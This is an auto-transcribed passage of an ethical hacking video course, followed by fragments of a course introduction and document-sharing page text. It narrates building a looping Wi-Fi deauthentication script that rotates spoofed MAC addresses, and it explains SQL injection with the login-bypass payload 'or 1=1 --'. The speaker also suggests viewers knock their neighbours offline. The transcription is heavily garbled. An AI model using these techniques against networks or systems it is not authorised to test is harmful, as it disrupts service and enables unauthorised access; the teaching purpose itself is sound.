What we want to do
after that is You want
to change the MAC address
after we have sent

all these 10 packets.
So what we will need to do
is put down our wireless network
and as already
discussed we can do
that with ifconfig wlan0 down.
And now what we want to do

is change our Mac address
so we can do
that with the simple tool

that we had installed
and saying Mac changer -
are so let me just open up

a Quick Tab and show you guys
how much Ginger actually works.
Now you can already check
out my other video called

the ethical hacking course,
which actually covers

a lot of topics
and Mac changer is just one

of them and you can check
how to use it in depth

in that video.
But for now, let me just give

you a brief introduction
how much change it works the Mac

changer will basically give you
a new Mac address
every time let me just open

up the help menu for you guys.

these are the options
that are available to us.
We can get a random Mac address.
We can also tell to show

our Mac address and we also
have to specify Interface
when we want to show

us the MAC address now,
let me just generate

new Mac address.
So you see our chair

that interface up
or insufficient permissions
is being shown.
So this means we always have

to put down our interface first.
So let me just do that

quickly ifconfig wlan0 down.
And now what we want to do is

give ourselves a new Mac address
and boom roasted.
We already have
a new Mac address
as you guys can see

from the new Mac part.
Now if you put back are

in network interface card,
and then try and show up

Mac address again weeks.
See that our current

MAC and are from red.
Mack are two completely

different Mac addresses
and of current MAC

and the new Mac I identical.
So this is how you

can actually generate
new Mac addresses to spoof

your own identity on the while
and that is very

useful in this case
because the person
you're attacking will be

so confused as to what to do
because your Mac address
is changing every time
and there's no real solution
to the situation
that you're creating for them.
At least.
I don't know of any solution.
If you do know
how to stop this for yourself.
Please leave it.
Down in the comment

section below and help
the world a little bit.
Now.
We wanted also get to know what

our Mac address is every time.
So let me just type my function
through the whole thing

and let me just try
and grab the new Mac address.
So my changer are wl1
and grab Mark and then we

want to put our Rental Car
in the monitor mode
and then we also want to put

up our network interface card.
Now, what we want to do

out here is optimize it
so we can be
attacking constantly.
So let us Put a sleep timer.
So this will make

our program sleep
for a particular amount of time.
I'm going to make

a sleep for 5 seconds.
So after every 5 seconds,
it's gonna send

that particular bssid.
Then the authentication messages
then just going to bring

down my interface card.
It's gonna change

my Mac address.
It's going to put back

the interface card
in the monitor mode

and sleep for 5 seconds.
And then repeat

the entire process
and to end the script.
Let's just say done.
So that will denote

when Loop is done now.
Let me just save it

Ctrl o control X to exit
and there we go.
Okay.
So first of all to actually run
this need to give it

some more permission.

we already have it.
Let me just put it

in a much more readable format.
Okay.
So as you guys can see our doors
does sh doesn't really

have execute ability
so we can do
that with command chmod.
So I'm going to give it
some executable permission.
So chmod One plus X

and then the name of the file.
So this will actually

change our dos dos SSH
into a executable bash script.
Okay.
So it seems that we
have done some error.
So let's just go back

into our bash script
and check for the error

that we have probably done.
So now -
does a jet d'eau start sh.
Okay.
So the thing
that I am missing is
that I forgot -
A that I'm supposed to put

before putting the bssid
and the are replay

Angie part of the code.
So let me just go ahead

and quickly do that.
Okay.
So now that that is done.
Let me just save it

and quickly exit and see
if this thing is working.
Ok.
So now we are trying

to work out our script
now you guys should know
that this Erica Wi-Fi

is my company's Wi-Fi
and I have complete permission
to go ahead and do this to them.
Also.
My company's Wi-Fi
is kind of secure.
So every time it senses
that ADI authentication

message is being sent.
I ain't like that.
It kind of changes the channel

that it is working on.
So these guys are

really smart smarter
than me most of the time
and this time I'm just going
to try and force them

to work on Channel 6.
So let me just go
ahead and run my script once.
Okay, so let me just check that.
They're still working

on Channel 6 Yep.
They're still working

on Channel 6.
Let me just check my script

once if it's correctly done
if I have the perfect Mark ID.
Let me just copy in the Mac ID

just to be sure once again,
so they go.
Copied it.
Let's go into the script

and let's face it out.
Okay.
So now that that is done

and we have mac IDs
and everything set up properly.

how to run the script so you go
Dot and backward slash

and then you said -
does SH now.
I see that our thing

is working on Channel 8.
So this will definitely

not book and say
that the SSID is not so

what we need to do
as I have showed you guys
earlier we can go aw config wl1

and change the channel 2.
Channel 6.
Oops, I channel
to channel it again.
This will not work.
I'm sorry.
That was my bad.
So now that we have changed

it to channel 6,
you can see that it is sending

everything immediately.
Okay.
So that is actually running

our script very well.
And as you guys can see

the security measures
are taken by my company.
It will not always

work on Channel 6.
It will keep rotating now

until it finds the safe channel.
So it really can't find

a safe Channel.
I was always be dosing

on Channel 6 and It will run.
Sometimes it won't run sometimes

but mostly with unsecured Wi-Fi
that is running at your home.
Mostly this will work

a hundred percent times.
So let me just stop this
because my company
will go mad on me
if I just keep on dancing them.
So this brings us to the end

of a demonstration.
This is how you can

always toss your neighbors
if they're annoying you
but remember if you're caught

you could be prosecuted.
So this was about

how the device works
with DDOS actually is

and the different types
and how you can do one

on your own with your own system
by my company.
It will not always work on

Channel 6 will keep rotating now
until it finds the safe channel.
So it really can't find

a safe Channel.
I was always be dosing
on Channel 6 and it will run

sometimes it won't run sometimes
but mostly with unsecured Wi-Fi
that is running at your home.

Mostly this will work
a hundred percent times.
So let me just stop this
because my company
will go mad on me
if I just keep on dancing them.
So this brings us to the end.
To off a demonstration.
This is how you can

always dose your neighbors
if they're annoying you
but remember if you're caught

you could be prosecuted.
So this was about

how the device Works
would beat us actually is
and the different types and

how you can do one on your own
with your own system.
In early days
of Internet building websites

were straightforward.
There was no JavaScript.
No back-end know CSS

and very few images
but as web gained

popularity the need
for more advanced technology
and dynamic websites group this
led to development of common

Gateway interface or CGI
as we call it and
server-side scripting languages
like ASP JavaScript PHP
and many others websites changed

and started storing user input
and site content.
Databases each and

every data field of a website is
like a gate to database

for example in login form.
The user enters the login data
and search failed

the user enters a search text
and in data saving form the user

enters the data to be saved.
All this indicate

data goes to database.
So instead of correct data,
if any malicious code is entered

then there are possibilities
for some serious damage

to happen to the database
and sometimes to the end.
Fire system and this is what

SQL injection is all about.
I'm sure you've heard

of SQL SQL query language
or SQL is a language
which is designed to man,
you plate and manage

data in a database
SQL injection attack is a type

of cybersecurity attack
that targets these databases

using specifically
crafted SQL statements

to trick the systems
into doing unexpected

and undesired things.
So by leveraging
an SQL injection vulnerability

present in web.
Or the website
given the right circumstances

an attacker can use it
to bypass web applications

authentication details as
in if you have login
and password user can
or attacker can enter

just the user ID.
Skip the password entry

and get into the system
or it can sometimes
retrieve the content
of an entire database.
He can also use SQL injection

vulnerability to add modify
and sometime delete records
in a database
affecting data Integrity
while using this vulnerability.
Attacker can do unimaginable

things this exactly shows
how dangerous and SQL

injection can be now.
Let's check out how a typical

SQL injection is carried out.
Well, let's start with

non-technical explanation guys.
Have a simple analogy here.
So first let's go through this.
Once you understand

this you are easily able
to relate this with what

SQL injection attack is.
So anyway first imagine
that you have

a fully automated bus
that functions based
on the instructions given by

human through a standard web.
Well that for might look

For example the for might say

drive through the route
and where should the bus stop
if when should the bus

stop this route and
where should the bus stop

and this condition?
That's when should the bus stop

or the user inputs.
This is where you will have

to enter the input
into the form now after putting

some data into the field.
It looks something
like this drive through Route
77 and stop at the bus stop
if there are people

at the bus stop.
Well, that looks

simple enough, right?
So basically you're the human
or the person is trying

to give 3 instruction
that is per should

stop at Route 77.
It should stop at the bus stop
if there are people

at the bus stop.
Well, that sounds harmless

now imagine a scenario
where someone manages

to send these instructions
which looks something
like this drive through Route 77

and do not stop at the bus stop
and ignore rest of the firm
if there are people

at the bus stop.
And now since the bus

is fully automated.
It does exactly as instructed.
It drives up Route
77 and does not stop
at any bus stop even

when there are people waited
because the instruction says

do not stop at the bus stop
and ignore the rest of the form.
So this part which is
if there are people

at the bus stop is ignored
we were able to do this
because the query structure
and the supplied data

are not separated properly
so that Automated bus

does not differentiate
between the instructions
and the data it simply does

anything that it is fed
with are asked to do well

SQL injection attacks are based
on the same concept attackers
are able to inject

malicious instructions
into good ones all of which

are then sent to database server
through web application

and now the technical
explanation and SQL injection
needs to conditions to exist
which is a relational database

that uses SQL and a user.
And put which is directly

used in an SQL query.
Let's say we have

an SQL statement
a simple SQL statement.
This statement says

select from table users
where username is so-and-so

and password is so
and so basically you

can think of it as a code
for a login form.
It's asking for the username
and the password

this SQL statement
is passed to a function
that sends the entire string

to Connected database
where it will be passed executed

and returns a result at the end
if you have noticed First

the statement contains
some special characters, right?
We have asked her

to return all the columns
for selected database row
and then there is equals

to only riddance values
that match the search string
and then we have

single quote here
and here to tell

the SQL database
where the search string

starts or ends.
So for user you
have starting here and in

here and for password here,
so basically a pair now

consider the following example
in which a website user is able

to change the Use of this user
and password such as

n log in form.
So if the values are put

into user and password,
it looks something
like this select
from users table.
The user name is Dean

and password as Winchester's
and the SQL statement

is simple enough.
It's very direct.
So if there is a user called

Dean with password Winchester's
then all the columns
of table users are

extracted now suppose
if the input is not properly

sanitized by the web application
the attacker Can easily insert

some malicious SQL statement
like this the username

might be Dean
or 1 is equal to 1
and then you have double hyphen

followed by password is equal
to Winchester's so basically
along with the data the user
or the attacker
has tried to enter
a malicious SQL statement

disguising it as a data here.
So guys, you need

to notice two things here.
First one we have or 1 is equal

to 1 it's a condition
that will always

be true therefore.
It is accepted as
a valid input by application.
For example, if Dean

is not a valid user or
if there is no user called Dean
in the database application

would consider the next value
because there is or in
between our next value

is 1 is equal to 1
which always returns true.
So basically our input will be

something like this Dean or true
and if there is no user called

Dean the next input will be true
and it will be taken

as an input value
and values will be displayed.
So the next part

which has double -
I'm sure you know

what double -
represents Droid.
Basically, it's commenting

the next part of the SQL query.
So it instruct the SQL passer
that the rest

of the line is a comment
and should not be executed.
So the part that's

password part will be ignored.
So basically what we're trying

to do is we're trying
to bypass the password

authentication here.
So once the query executes

the SQL injection effectively
removes the password

verification resulting
in an authentication bypass
by using double life,
and we're commenting

rest of the comment.
And before that using

one is equal to one
which is translated to true.
We are trying to enter

the database without even
giving an invalid value.
So the application will most

likely log the attacker in
with the first account

from the query result.
And as you guys know most

of the time the first account
in a database is
that if an administrative user

so basically by doing nothing
or basically by giving
some random data here
the attacker was able

to extract the admin details,
it sounds very dangerous, right?
So that's all an SQL

injection attack is all about

(English (United States) ) Ethical Hacking Full Course - Learn Ethical Hacking in 10 Hours - Ethical Hacking Tutorial - Edureka (DownSub - Com)

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

(English (United States) ) Ethical Hacking Full Course - Learn Ethical Hacking in 10 Hours - Ethical Hacking Tutorial - Edureka (DownSub - Com)

Încărcat de

Drepturi de autor:

Formate disponibile

Hi guys, my name

is Aarya and I'm going

we'll be learning almost

for you to get started

So come let's quickly go

that we are going

We're going to be going

where we'll be learning

and how the cryptography

into the whole picture next.

how the Cyber threads

and then we will also see

After which we will be looking

into the history

We learn how this all began

And then we will be looking

of networking and ethical

the various tools

that are used

in ethical hacking and also

These tools are used

We will be having a look

into what the most

That is Kali Linux.

Kali Linux is used

and penetration testers all

around the world

how to install this

on our local systems

that come along with it

and Bash we should be using

So in this we will be learning

and using Metasploit

Learn more about vulnerability

and take advantages

of these vulnerabilities now

that we are going

how we can use nmap

from our networks and

how we can use this information

We'll be learning deeply

that are there

is cross-site scripting secondly

and thirdly SQL

Now we be doing these attacks

and learning more

and how they are orchestrated

more about how we

we will also be discussing

some very Advanced cryptography

which is basically used

inside images last but not the

be discussing the job profiles

Re and we will also

that are hiring for these job

that they are trying to offer.

Also, we won't be leaving

be discussing the 50 most

that come along

so that you can snag

that job interview and if you do

please leave us a like,

please leave a comment